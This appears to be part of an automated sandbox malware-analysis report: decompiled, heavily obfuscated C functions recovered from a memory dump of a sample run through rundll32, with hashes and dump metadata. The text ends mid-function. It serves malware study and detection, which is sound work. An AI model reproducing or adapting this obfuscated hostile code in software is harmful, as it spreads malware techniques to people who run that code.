                                                                                                                      0x0034c11b
                                                                                                                      0x0034c135
                                                                                                                      0x0034c135
                                                                                                                      0x00000000
                                                                                                                      0x0034c135
                                                                                                                      0x0034c11d
                                                                                                                      0x0034c12f
                                                                                                                      0x0034c12f
                                                                                                                      0x0034c133
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034c133
                                                                                                                      0x00000000
                                                                                                                      0x0034c13a
                                                                                                                      0x0034c13a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5]M$89t$f,s
                                                                                                                      • API String ID: 0-187558970
                                                                                                                      • Opcode ID: b8f6f788a1341fb326c7f6acff40e4f4ddc65e0342340909664983d1fd6761a5
                                                                                                                      • Instruction ID: 16c4fa2eb819fcf3cd482d26e96043f7acda7a56eca65f7b1cc7b427531373e7
                                                                                                                      • Opcode Fuzzy Hash: b8f6f788a1341fb326c7f6acff40e4f4ddc65e0342340909664983d1fd6761a5
                                                                                                                      • Instruction Fuzzy Hash: 4FB142B15183809FC358CF25C88951BFBE1FBC8358F408A1DF5969A260D7B6DA48CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00343FB8() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				signed int _v1044;
                                                                                                                      				signed int _v1048;
                                                                                                                      				intOrPtr _v1052;
                                                                                                                      				intOrPtr _v1056;
                                                                                                                      				signed int _v1060;
                                                                                                                      				signed int _v1064;
                                                                                                                      				signed int _v1068;
                                                                                                                      				signed int _v1072;
                                                                                                                      				signed int _v1076;
                                                                                                                      				signed int _v1080;
                                                                                                                      				signed int _v1084;
                                                                                                                      				signed int _v1088;
                                                                                                                      				signed int _v1092;
                                                                                                                      				signed int _v1096;
                                                                                                                      				signed int _v1100;
                                                                                                                      				signed int _v1104;
                                                                                                                      				signed int _v1108;
                                                                                                                      				signed int _v1112;
                                                                                                                      				signed int _v1116;
                                                                                                                      				signed int _v1120;
                                                                                                                      				signed int _v1124;
                                                                                                                      				signed int _v1128;
                                                                                                                      				signed int _v1132;
                                                                                                                      				signed int _v1136;
                                                                                                                      				signed int _v1140;
                                                                                                                      				signed int _v1144;
                                                                                                                      				signed int _v1148;
                                                                                                                      				signed int _v1152;
                                                                                                                      				signed int _v1156;
                                                                                                                      				signed int _v1160;
                                                                                                                      				signed int _v1164;
                                                                                                                      				signed int _v1168;
                                                                                                                      				signed int _v1172;
                                                                                                                      				void* _t262;
                                                                                                                      				intOrPtr _t274;
                                                                                                                      				void* _t279;
                                                                                                                      				intOrPtr _t281;
                                                                                                                      				intOrPtr _t283;
                                                                                                                      				signed int _t305;
                                                                                                                      				signed int _t306;
                                                                                                                      				signed int* _t309;
                                                                                                                      
                                                                                                                      				_t309 =  &_v1172;
                                                                                                                      				_v1048 = _v1048 & 0x00000000;
                                                                                                                      				_v1044 = _v1044 & 0x00000000;
                                                                                                                      				_t279 = 0xa0c284c;
                                                                                                                      				_v1056 = 0xafe7d9;
                                                                                                                      				_v1052 = 0x960b65;
                                                                                                                      				_v1120 = 0x40f49c;
                                                                                                                      				_v1120 = _v1120 + 0xc807;
                                                                                                                      				_v1120 = _v1120 * 0x4f;
                                                                                                                      				_v1120 = _v1120 ^ 0x1446f881;
                                                                                                                      				_v1116 = 0x6254e6;
                                                                                                                      				_t305 = 3;
                                                                                                                      				_v1116 = _v1116 * 5;
                                                                                                                      				_v1116 = _v1116 + 0xcc41;
                                                                                                                      				_v1116 = _v1116 ^ 0x01ee9a48;
                                                                                                                      				_v1104 = 0xc01800;
                                                                                                                      				_v1104 = _v1104 | 0x48a752a3;
                                                                                                                      				_v1104 = _v1104 ^ 0x48e65f13;
                                                                                                                      				_v1128 = 0x7c2fed;
                                                                                                                      				_v1128 = _v1128 | 0x2c3c97c8;
                                                                                                                      				_v1128 = _v1128 * 0x77;
                                                                                                                      				_v1128 = _v1128 ^ 0xadff29d3;
                                                                                                                      				_v1136 = 0x195939;
                                                                                                                      				_v1136 = _v1136 + 0xfffffbae;
                                                                                                                      				_v1136 = _v1136 * 0x49;
                                                                                                                      				_v1136 = _v1136 ^ 0x073ad8c6;
                                                                                                                      				_v1168 = 0xbc4bb5;
                                                                                                                      				_v1168 = _v1168 / _t305;
                                                                                                                      				_v1168 = _v1168 << 0xd;
                                                                                                                      				_v1168 = _v1168 ^ 0xd1f3631f;
                                                                                                                      				_v1168 = _v1168 ^ 0x0980812e;
                                                                                                                      				_v1084 = 0x2affe9;
                                                                                                                      				_v1084 = _v1084 >> 0xd;
                                                                                                                      				_v1084 = _v1084 ^ 0x00075e3f;
                                                                                                                      				_v1112 = 0x7143ab;
                                                                                                                      				_v1112 = _v1112 >> 0xb;
                                                                                                                      				_t306 = 0x4a;
                                                                                                                      				_v1112 = _v1112 / _t306;
                                                                                                                      				_v1112 = _v1112 ^ 0x000905fb;
                                                                                                                      				_v1100 = 0xf39387;
                                                                                                                      				_v1100 = _v1100 + 0xffffb245;
                                                                                                                      				_v1100 = _v1100 ^ 0x00f5952a;
                                                                                                                      				_v1160 = 0xdc501f;
                                                                                                                      				_v1160 = _v1160 >> 0xb;
                                                                                                                      				_v1160 = _v1160 | 0xffab4649;
                                                                                                                      				_v1160 = _v1160 * 0x4a;
                                                                                                                      				_v1160 = _v1160 ^ 0xe7809492;
                                                                                                                      				_v1076 = 0x9b6a27;
                                                                                                                      				_v1076 = _v1076 >> 9;
                                                                                                                      				_v1076 = _v1076 ^ 0x0000c221;
                                                                                                                      				_v1132 = 0x7dd85e;
                                                                                                                      				_v1132 = _v1132 + 0xffff3c07;
                                                                                                                      				_v1132 = _v1132 ^ 0x5ccf103a;
                                                                                                                      				_v1132 = _v1132 ^ 0x5cb197cc;
                                                                                                                      				_v1060 = 0x3a660e;
                                                                                                                      				_v1060 = _v1060 ^ 0x9c30fae7;
                                                                                                                      				_v1060 = _v1060 ^ 0x9c0496c9;
                                                                                                                      				_v1124 = 0xd6fa60;
                                                                                                                      				_v1124 = _v1124 >> 0xc;
                                                                                                                      				_v1124 = _v1124 * 0x63;
                                                                                                                      				_v1124 = _v1124 ^ 0x0000f3a0;
                                                                                                                      				_v1088 = 0xffa7cd;
                                                                                                                      				_v1088 = _v1088 ^ 0xcc4f33e8;
                                                                                                                      				_v1088 = _v1088 ^ 0xccbde027;
                                                                                                                      				_v1096 = 0xc2302a;
                                                                                                                      				_v1096 = _v1096 ^ 0x3cf81aba;
                                                                                                                      				_v1096 = _v1096 ^ 0x3c3bc632;
                                                                                                                      				_v1064 = 0x2b9d03;
                                                                                                                      				_v1064 = _v1064 + 0xffffce76;
                                                                                                                      				_v1064 = _v1064 ^ 0x0029f92b;
                                                                                                                      				_v1164 = 0x820e56;
	_v1164 = _v1164 >> 0xd;
	_v1164 = _v1164 + 0xa8ad;
	_v1164 = _v1164 | 0xfa0f2dae;
	_v1164 = _v1164 ^ 0xfa046831;
	_v1068 = 0x2883d9;
	_v1068 = _v1068 + 0xffff633a;
	_v1068 = _v1068 ^ 0x0026d05d;
	_v1156 = 0x6f33fd;
	_v1156 = _v1156 << 0xe;
	_v1156 = _v1156 + 0xfcd0;
	_v1156 = _v1156 + 0x75bd;
	_v1156 = _v1156 ^ 0xcd0f8dab;
	_v1172 = 0xb8c1fe;
	_v1172 = _v1172 << 6;
	_v1172 = _v1172 * 0x6a;
	_v1172 = _v1172 << 4;
	_v1172 = _v1172 ^ 0x014ff662;
	_v1148 = 0xbed93a;
	_v1148 = _v1148 * 0x3e;
	_v1148 = _v1148 << 0xa;
	_v1148 = _v1148 ^ 0x5e071c48;
	_v1148 = _v1148 ^ 0xbc7b36e3;
	_v1092 = 0x46d8d3;
	_v1092 = _v1092 << 5;
	_v1092 = _v1092 ^ 0x08d1099a;
	_v1140 = 0x5a5c4c;
	_v1140 = _v1140 ^ 0xa959b0b3;
	_v1140 = _v1140 << 3;
	_v1140 = _v1140 ^ 0x481958d7;
	_v1080 = 0xac3d63;
	_v1080 = _v1080 * 0x50;
	_v1080 = _v1080 ^ 0x35d8e2dc;
	_v1152 = 0x840294;
	_v1152 = _v1152 + 0xffff0ee6;
	_v1152 = _v1152 ^ 0xf9fb415c;
	_v1152 = _v1152 | 0x82095beb;
	_v1152 = _v1152 ^ 0xfb725375;
	_v1072 = 0xb67c6d;
	_v1072 = _v1072 + 0xffffc0d8;
	_v1072 = _v1072 ^ 0x00b2e767;
	_v1144 = 0x5c5bd3;
	_v1144 = _v1144 ^ 0x420c1b91;
	_v1144 = _v1144 * 0x79;
	_v1144 = _v1144 >> 9;
	_v1144 = _v1144 ^ 0x002d898c;
	_v1108 = 0xefd7e6;
	_v1108 = _v1108 * 0x73;
	_v1108 = _v1108 * 0x61;
	_v1108 = _v1108 ^ 0xd2fa3683;
	do {
		while(_t279 != 0x10bc038) {
			if(_t279 == 0x5d7fb4e) {
				E003541A7();
				L11:
				_t279 = 0x10bc038;
				continue;
			}
			if(_t279 == 0x666e3d5) {
				E003444FA( &_v520, _v1064, _v1164, _v1068, _v1156);
				_push( &_v1040);
				_push( &_v520);
				_push(_v1092);
				E00348D95(_v1172, _v1148, __eflags);
				_t309 =  &(_t309[6]);
				_t279 = 0xe0c3523;
				continue;
			}
			if(_t279 == 0x90d07ee) {
				_t274 = E003504B8();
				goto L11;
			}
			if(_t279 == 0xa0c284c) {
				_t274 =  *0x36520c; // 0x0
				__eflags =  *((intOrPtr*)(_t274 + 0x438));
				_t279 =  !=  ? 0x90d07ee : 0x5d7fb4e;
				continue;
			}
			if(_t279 != 0xe0c3523) {
				goto L15;
			}
			 *((short*)(E00354FA8(_v1140,  &_v1040, _v1080, _v1152))) = 0;
			return E00345B6B(_v1072, _v1144,  &_v1040, _v1108);
		}
		_push(_v1112);
		_push(_v1084);
		_push(0x3410cc);
		_t262 = E0034AB66(_v1136, _v1168, __eflags);
		_t281 =  *0x36520c; // 0x0
		_t283 =  *0x36520c; // 0x0
		__eflags = _t283 + 8;
		E0034E7CE(_t262, _t283 + 8, _v1100, _t283 + 8, _t281 + 0x220, _v1160, _v1076, _v1132, _v1060, _t281 + 0x220);
		E0034AE03(_v1124, _v1088, _v1096, _t262);
		_t309 =  &(_t309[0xd]);
		_t279 = 0x666e3d5;
		L15:
		__eflags = _t279 - 0xfda68b3;
	} while (__eflags != 0);
	return _t274;
}
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: L\Z$/|$Tb
                                                                                                                      • API String ID: 0-3338791969
                                                                                                                      • Opcode ID: 4fbffdc7144ad949a19b3b518696e7bb880ac34143660a7b14b93cfdfe8ff90b
                                                                                                                      • Instruction ID: 42a99d42d2718a5d5c8bf27ca5af44d11607ded2cf37daca21dabe85a188eb2b
                                                                                                                      • Opcode Fuzzy Hash: 4fbffdc7144ad949a19b3b518696e7bb880ac34143660a7b14b93cfdfe8ff90b
                                                                                                                      • Instruction Fuzzy Hash: E7D1E1714087818FC769CF61C48961FFBE0FBC4758F108A1DF2A69A260D7B59A49CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0034F93D() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				intOrPtr _v1044;
                                                                                                                      				intOrPtr _v1048;
                                                                                                                      				intOrPtr _v1052;
                                                                                                                      				intOrPtr _v1056;
                                                                                                                      				signed int _v1060;
                                                                                                                      				signed int _v1064;
                                                                                                                      				signed int _v1068;
                                                                                                                      				signed int _v1072;
                                                                                                                      				signed int _v1076;
                                                                                                                      				signed int _v1080;
                                                                                                                      				signed int _v1084;
                                                                                                                      				signed int _v1088;
                                                                                                                      				signed int _v1092;
                                                                                                                      				signed int _v1096;
                                                                                                                      				signed int _v1100;
                                                                                                                      				signed int _v1104;
                                                                                                                      				signed int _v1108;
                                                                                                                      				signed int _v1112;
                                                                                                                      				signed int _v1116;
                                                                                                                      				signed int _v1120;
                                                                                                                      				signed int _v1124;
                                                                                                                      				signed int _v1128;
                                                                                                                      				signed int _v1132;
                                                                                                                      				signed int _v1136;
                                                                                                                      				signed int _v1140;
                                                                                                                      				void* _t255;
                                                                                                                      				void* _t258;
                                                                                                                      				intOrPtr _t259;
                                                                                                                      				intOrPtr _t261;
                                                                                                                      				void* _t266;
                                                                                                                      				intOrPtr _t302;
                                                                                                                      				signed int _t303;
                                                                                                                      				signed int _t304;
                                                                                                                      				signed int _t305;
                                                                                                                      				signed int _t306;
                                                                                                                      				signed int _t307;
                                                                                                                      				signed int _t308;
                                                                                                                      				signed int _t309;
                                                                                                                      				signed int _t310;
                                                                                                                      				signed int _t311;
                                                                                                                      				signed int _t312;
                                                                                                                      				signed int* _t315;
                                                                                                                      
                                                                                                                      				_t315 =  &_v1140;
                                                                                                                      				_v1056 = 0x7fa207;
                                                                                                                      				_v1052 = 0x3c49bf;
                                                                                                                      				_t266 = 0x35a8362;
                                                                                                                      				_t302 = 0;
                                                                                                                      				_v1048 = 0;
                                                                                                                      				_v1044 = 0;
                                                                                                                      				_v1060 = 0xe96fdd;
                                                                                                                      				_v1060 = _v1060 + 0xffff4dc5;
                                                                                                                      				_v1060 = _v1060 ^ 0x00e8fae7;
                                                                                                                      				_v1084 = 0x95aacc;
                                                                                                                      				_t303 = 0x76;
                                                                                                                      				_v1084 = _v1084 / _t303;
                                                                                                                      				_v1084 = _v1084 ^ 0x00004e07;
                                                                                                                      				_v1132 = 0x8ad3c0;
                                                                                                                      				_t304 = 0x3b;
                                                                                                                      				_v1132 = _v1132 / _t304;
                                                                                                                      				_t305 = 5;
                                                                                                                      				_v1132 = _v1132 / _t305;
                                                                                                                      				_t306 = 0x2e;
                                                                                                                      				_v1132 = _v1132 / _t306;
                                                                                                                      				_v1132 = _v1132 ^ 0x0002326f;
                                                                                                                      				_v1136 = 0x5025c5;
                                                                                                                      				_v1136 = _v1136 | 0xd1709035;
                                                                                                                      				_v1136 = _v1136 + 0xfffff598;
                                                                                                                      				_v1136 = _v1136 | 0xced027f9;
                                                                                                                      				_v1136 = _v1136 ^ 0xdffed43e;
                                                                                                                      				_v1076 = 0x8b6e07;
                                                                                                                      				_v1076 = _v1076 ^ 0x693ed631;
                                                                                                                      				_v1076 = _v1076 ^ 0x69bbe5bc;
                                                                                                                      				_v1096 = 0x201396;
                                                                                                                      				_v1096 = _v1096 ^ 0x88694b71;
                                                                                                                      				_v1096 = _v1096 + 0xffff467e;
                                                                                                                      				_v1096 = _v1096 ^ 0x884e23ab;
                                                                                                                      				_v1068 = 0x6d8c34;
                                                                                                                      				_v1068 = _v1068 ^ 0x91e2fcbf;
                                                                                                                      				_v1068 = _v1068 ^ 0x9185a139;
                                                                                                                      				_v1128 = 0x807b8c;
                                                                                                                      				_v1128 = _v1128 | 0x3609e9e3;
                                                                                                                      				_v1128 = _v1128 + 0xffff6ddf;
                                                                                                                      				_v1128 = _v1128 + 0xffffdf1a;
                                                                                                                      				_v1128 = _v1128 ^ 0x3687a3ab;
                                                                                                                      				_v1104 = 0xe6d4b9;
                                                                                                                      				_v1104 = _v1104 >> 0xd;
                                                                                                                      				_t307 = 0x48;
                                                                                                                      				_v1104 = _v1104 / _t307;
                                                                                                                      				_v1104 = _v1104 * 0x6c;
                                                                                                                      				_v1104 = _v1104 ^ 0x0006818d;
                                                                                                                      				_v1064 = 0xd65a00;
                                                                                                                      				_v1064 = _v1064 + 0x372a;
                                                                                                                      				_v1064 = _v1064 ^ 0x00dea864;
                                                                                                                      				_v1088 = 0x4d0087;
                                                                                                                      				_v1088 = _v1088 + 0xffffb4c7;
                                                                                                                      				_v1088 = _v1088 ^ 0x0a5aafbb;
                                                                                                                      				_v1088 = _v1088 ^ 0x0a1526df;
                                                                                                                      				_v1092 = 0x9c5ab3;
                                                                                                                      				_t308 = 0x3c;
                                                                                                                      				_v1092 = _v1092 / _t308;
                                                                                                                      				_v1092 = _v1092 >> 1;
                                                                                                                      				_v1092 = _v1092 ^ 0x000c3f19;
                                                                                                                      				_v1140 = 0x5b7912;
                                                                                                                      				_v1140 = _v1140 + 0xffff68b5;
                                                                                                                      				_t309 = 0x6d;
                                                                                                                      				_v1140 = _v1140 * 0xe;
                                                                                                                      				_v1140 = _v1140 >> 1;
                                                                                                                      				_v1140 = _v1140 ^ 0x02711af4;
                                                                                                                      				_v1120 = 0xf0336c;
                                                                                                                      				_v1120 = _v1120 + 0x850d;
                                                                                                                      				_v1120 = _v1120 << 3;
                                                                                                                      				_v1120 = _v1120 / _t309;
                                                                                                                      				_v1120 = _v1120 ^ 0x00151fd7;
                                                                                                                      				_v1112 = 0x1d5cd4;
                                                                                                                      				_v1112 = _v1112 << 7;
                                                                                                                      				_v1112 = _v1112 | 0x8feadd76;
                                                                                                                      				_v1112 = _v1112 << 0x10;
                                                                                                                      				_v1112 = _v1112 ^ 0xff743f21;
                                                                                                                      				_v1116 = 0x1a947a;
                                                                                                                      				_v1116 = _v1116 + 0x75f0;
                                                                                                                      				_v1116 = _v1116 << 0xa;
                                                                                                                      				_t310 = 0x5a;
                                                                                                                      				_v1116 = _v1116 * 0x6e;
                                                                                                                      				_v1116 = _v1116 ^ 0x79e60e9e;
                                                                                                                      				_v1124 = 0xbb349e;
                                                                                                                      				_v1124 = _v1124 / _t310;
                                                                                                                      				_v1124 = _v1124 << 8;
                                                                                                                      				_t311 = 0x54;
                                                                                                                      				_v1124 = _v1124 / _t311;
                                                                                                                      				_v1124 = _v1124 ^ 0x000c08c5;
                                                                                                                      				_v1080 = 0xb1ec11;
                                                                                                                      				_v1080 = _v1080 | 0x4ad04b34;
                                                                                                                      				_v1080 = _v1080 ^ 0x4af1877a;
                                                                                                                      				_v1072 = 0x6450ea;
                                                                                                                      				_v1072 = _v1072 ^ 0x5bd0ca6d;
                                                                                                                      				_v1072 = _v1072 ^ 0x5bbfa4d9;
                                                                                                                      				_v1100 = 0x193680;
                                                                                                                      				_v1100 = _v1100 + 0xffff84f1;
                                                                                                                      				_t312 = 0x39;
                                                                                                                      				_v1100 = _v1100 / _t312;
                                                                                                                      				_v1100 = _v1100 ^ 0x185ca7c1;
                                                                                                                      				_v1100 = _v1100 ^ 0x1855126a;
                                                                                                                      				_v1108 = 0xe40e26;
                                                                                                                      				_v1108 = _v1108 + 0xffff805f;
                                                                                                                      				_v1108 = _v1108 << 4;
                                                                                                                      				_v1108 = _v1108 ^ 0x0e3caf6d;
                                                                                                                      				do {
                                                                                                                      					while(_t266 != 0x35a8362) {
                                                                                                                      						if(_t266 == 0x706ecca) {
                                                                                                                      							E0035E498(_v1072, _v1100, _v1108,  &_v1040);
                                                                                                                      						} else {
                                                                                                                      							if(_t266 == 0xd630330) {
                                                                                                                      								_push( &_v520);
                                                                                                                      								_push( &_v1040);
                                                                                                                      								_push(_v1080);
                                                                                                                      								_t255 = E00348D95(_v1116, _v1124, __eflags);
                                                                                                                      								_t315 =  &(_t315[3]);
                                                                                                                      								__eflags = _t255;
                                                                                                                      								_t302 =  !=  ? 1 : _t302;
                                                                                                                      								_t266 = 0x706ecca;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t266 == 0xdb8f695) {
                                                                                                                      									E003612A8(_t266, _v1060, __eflags, _v1084, _v1132,  &_v520);
                                                                                                                      									_t315 =  &(_t315[3]);
                                                                                                                      									_t266 = 0xe8d55c7;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									_t322 = _t266 - 0xe8d55c7;
                                                                                                                      									if(_t266 != 0xe8d55c7) {
                                                                                                                      										goto L10;
                                                                                                                      									} else {
                                                                                                                      										_push(_v1068);
                                                                                                                      										_push(_v1096);
                                                                                                                      										_push(0x3410cc);
                                                                                                                      										_t258 = E0034AB66(_v1136, _v1076, _t322);
                                                                                                                      										_t259 =  *0x36520c; // 0x0
                                                                                                                      										_t261 =  *0x36520c; // 0x0
                                                                                                                      										E0034E7CE(_t258, _t322, _v1128, _t261 + 8, _v1136, _v1104, _v1064, _v1088, _v1092, _t259 + 0x220);
                                                                                                                      										E0034AE03(_v1140, _v1120, _v1112, _t258);
                                                                                                                      										_t315 =  &(_t315[0xd]);
                                                                                                                      										_t266 = 0xd630330;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L13:
                                                                                                                      						return _t302;
                                                                                                                      					}
                                                                                                                      					_t266 = 0xdb8f695;
                                                                                                                      					L10:
                                                                                                                      					__eflags = _t266 - 0x3cedcca;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L13;
                                                                                                                      			}
















































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *7$Pd$6
                                                                                                                      • API String ID: 0-2172486832
                                                                                                                      • Opcode ID: 3d2506e9f47e1989dcb0918540491f154efc7d0c8a154774cf791730a520e7fb
                                                                                                                      • Instruction ID: 7edb48eeced8f33b3e892627cbcf2eea50117079b715019dd429fb0c6aa02316
                                                                                                                      • Opcode Fuzzy Hash: 3d2506e9f47e1989dcb0918540491f154efc7d0c8a154774cf791730a520e7fb
                                                                                                                      • Instruction Fuzzy Hash: 10B133B15083409FD354CF26C88994FFBE1FBC8758F408A2DF6968A260D7B59909CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 75%
                                                                                                                      			E00348D95(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				void* _t231;
                                                                                                                      				signed int _t261;
                                                                                                                      				signed int _t265;
                                                                                                                      				signed int _t266;
                                                                                                                      				signed int _t267;
                                                                                                                      				signed int _t268;
                                                                                                                      				void* _t269;
                                                                                                                      				intOrPtr* _t290;
                                                                                                                      				void* _t291;
                                                                                                                      
                                                                                                                      				_t290 = _t291 - 0x6c;
                                                                                                                      				_push( *((intOrPtr*)(_t290 + 0x7c)));
                                                                                                                      				_push( *((intOrPtr*)(_t290 + 0x78)));
                                                                                                                      				_push( *((intOrPtr*)(_t290 + 0x74)));
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t231);
                                                                                                                      				 *(_t290 + 8) =  *(_t290 + 8) & 0x00000000;
                                                                                                                      				 *_t290 = 0x81872b;
                                                                                                                      				 *((intOrPtr*)(_t290 + 4)) = 0xdf4fac;
                                                                                                                      				 *(_t290 + 0x2c) = 0x807aaf;
                                                                                                                      				_t265 = 0x3e;
                                                                                                                      				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) * 0x66;
                                                                                                                      				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) >> 0xc;
                                                                                                                      				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) ^ 0x0003330f;
                                                                                                                      				 *(_t290 + 0x50) = 0x6f2162;
                                                                                                                      				 *(_t290 + 0x50) =  *(_t290 + 0x50) >> 4;
                                                                                                                      				 *(_t290 + 0x50) =  *(_t290 + 0x50) * 0x62;
                                                                                                                      				 *(_t290 + 0x50) =  *(_t290 + 0x50) + 0xffffa9e2;
                                                                                                                      				 *(_t290 + 0x50) =  *(_t290 + 0x50) ^ 0x02a8505a;
                                                                                                                      				 *(_t290 + 0x58) = 0xe574ec;
                                                                                                                      				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0x326d;
                                                                                                                      				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x9da0d68a;
                                                                                                                      				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0xbde6;
                                                                                                                      				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x9d4627b9;
                                                                                                                      				 *(_t290 + 0x20) = 0xd3956a;
                                                                                                                      				 *(_t290 + 0x20) =  *(_t290 + 0x20) * 0x24;
                                                                                                                      				 *(_t290 + 0x20) =  *(_t290 + 0x20) ^ 0x1dc1e5a2;
                                                                                                                      				 *(_t290 + 0x14) = 0xfcd290;
                                                                                                                      				 *(_t290 + 0x14) =  *(_t290 + 0x14) >> 0x10;
                                                                                                                      				 *(_t290 + 0x14) =  *(_t290 + 0x14) ^ 0x00095bca;
                                                                                                                      				 *(_t290 + 0x64) = 0x85109;
                                                                                                                      				 *(_t290 + 0x64) =  *(_t290 + 0x64) | 0x78e3fbb1;
                                                                                                                      				 *(_t290 + 0x64) =  *(_t290 + 0x64) + 0xffffa60f;
                                                                                                                      				 *(_t290 + 0x64) =  *(_t290 + 0x64) | 0x3bc8e61c;
                                                                                                                      				 *(_t290 + 0x64) =  *(_t290 + 0x64) ^ 0x7bee7ea1;
                                                                                                                      				 *(_t290 + 0x3c) = 0x71f5e0;
                                                                                                                      				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) >> 3;
                                                                                                                      				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) + 0xebfe;
                                                                                                                      				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) ^ 0x0002c43f;
                                                                                                                      				 *(_t290 + 0x28) = 0x899f0e;
                                                                                                                      				 *(_t290 + 0x28) =  *(_t290 + 0x28) + 0x8a6f;
                                                                                                                      				 *(_t290 + 0x28) =  *(_t290 + 0x28) ^ 0x0089e2c7;
                                                                                                                      				 *(_t290 + 0x54) = 0x38c331;
                                                                                                                      				 *(_t290 + 0x54) =  *(_t290 + 0x54) / _t265;
                                                                                                                      				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x1d97b6ad;
                                                                                                                      				_t266 = 0x30;
                                                                                                                      				 *(_t290 + 0x54) =  *(_t290 + 0x54) / _t266;
                                                                                                                      				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x0098c8d2;
                                                                                                                      				 *(_t290 + 0x38) = 0xd05f1;
                                                                                                                      				 *(_t290 + 0x38) =  *(_t290 + 0x38) >> 7;
                                                                                                                      				 *(_t290 + 0x38) =  *(_t290 + 0x38) << 0xf;
                                                                                                                      				 *(_t290 + 0x38) =  *(_t290 + 0x38) ^ 0x0d051a45;
                                                                                                                      				 *(_t290 + 0x30) = 0x1cfed4;
                                                                                                                      				 *(_t290 + 0x30) =  *(_t290 + 0x30) >> 0x10;
                                                                                                                      				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0xc4190834;
                                                                                                                      				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0xc41fa725;
                                                                                                                      				 *(_t290 + 0x40) = 0x1c7373;
                                                                                                                      				 *(_t290 + 0x40) =  *(_t290 + 0x40) * 0x75;
                                                                                                                      				 *(_t290 + 0x40) =  *(_t290 + 0x40) << 0xc;
                                                                                                                      				 *(_t290 + 0x40) =  *(_t290 + 0x40) ^ 0x0c3b1071;
                                                                                                                      				 *(_t290 + 0x18) = 0x2a4c72;
                                                                                                                      				 *(_t290 + 0x18) =  *(_t290 + 0x18) >> 0xe;
                                                                                                                      				 *(_t290 + 0x18) =  *(_t290 + 0x18) ^ 0x00012640;
                                                                                                                      				 *(_t290 + 0x4c) = 0xadab42;
                                                                                                                      				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) + 0xc082;
                                                                                                                      				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0x0f040eb7;
                                                                                                                      				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) | 0xc54ebe7a;
                                                                                                                      				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0xcfe19c3b;
                                                                                                                      				 *(_t290 + 0x5c) = 0x1c041c;
                                                                                                                      				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) + 0x881f;
                                                                                                                      				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) + 0xa114;
                                                                                                                      				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) << 2;
                                                                                                                      				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) ^ 0x007200ac;
                                                                                                                      				 *(_t290 + 0x44) = 0x9cf7da;
